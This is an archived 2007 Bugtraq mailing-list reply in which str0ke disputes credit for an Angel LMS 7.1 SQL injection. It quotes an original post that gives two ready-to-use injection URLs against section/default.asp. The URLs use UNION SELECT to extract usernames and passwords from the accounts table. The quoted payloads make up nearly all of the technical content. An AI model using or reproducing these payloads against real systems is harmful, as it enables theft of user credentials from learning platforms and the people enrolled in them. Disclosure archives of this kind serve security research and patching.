Re: Angel LMS 7.1 - Remote SQL Injection

To: "Guns@xxxxxxxxx" <Guns@xxxxxxxxx>
Subject: Re: Angel LMS 7.1 - Remote SQL Injection
From: str0ke <str0ke@xxxxxxxxxxx>
Date: Thu, 1 Mar 2007 11:33:12 -0600
Cc: bugtraq@xxxxxxxxxxxxxxxxx
Dkim-signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=THN1eVoofYSew+H/U/f7RqODUVOrY6SHxNlpQg0wHRXupJAA36BHcoGJmur5jcBnMTVyfQHxbcCvg5q+oiiN1epbyojMTzC2DhEnNrEEKi0Wz0q4HOgL9fSwEPq8NziLBUR7tvAbKx6E52bC/4yE1UfILu80eeRglT4fd7687k8=
Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:sender:to:subject:cc:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references:x-google-sender-auth; b=tTtzE7dy3g2hvXsvw0QSzSIOOxwVU4SPOaYejsrWcFKPYl+suxBqJlE2MHAed0hoWH6qmPI/M7I7c5uSDNa0yg9QMgy0I+LEs86WE7oap0JaJc0InSrdsbITWAntIpRmzUAwIWhSjbFq2iZ5LRVTFtgi1b2lZcOYbMmhFG2PpA0=
In-reply-to: <20070301160606.20961.qmail@xxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20070301160606.20961.qmail@xxxxxxxxxxxxxxxxx>
Sender: milw0rm@xxxxxxxxx

# Credit:
#       Exploit discovered by Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com

http://www.milw0rm.com/exploits/3390

Plagiarism sucks.

/str0ke

On 1 Mar 2007 16:06:06 -0000, Guns@xxxxxxxxx <Guns@xxxxxxxxx> wrote:

# Angel LMS 7.1 Remote SQL Injection
# by Guns

#All User Accounts#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20username%20from%20accounts--"

#Account Passwords#
http://[Angel Root 
Directory]/section/default.asp?id='%20union%20select%20top%201%20password%20from%20accounts--"

References:
- Angel LMS 7.1 - Remote SQL Injection
  - From: Guns

Prev by Date: Serendipity unauthenticated SQL-Injection
Next by Date: Built2Go v.1.0 => ( news.php & rating.php ) Cross Site Scripting
Previous by thread: Angel LMS 7.1 - Remote SQL Injection
Next by thread: Serendipity unauthenticated SQL-Injection
Index(es):
- Date
- Thread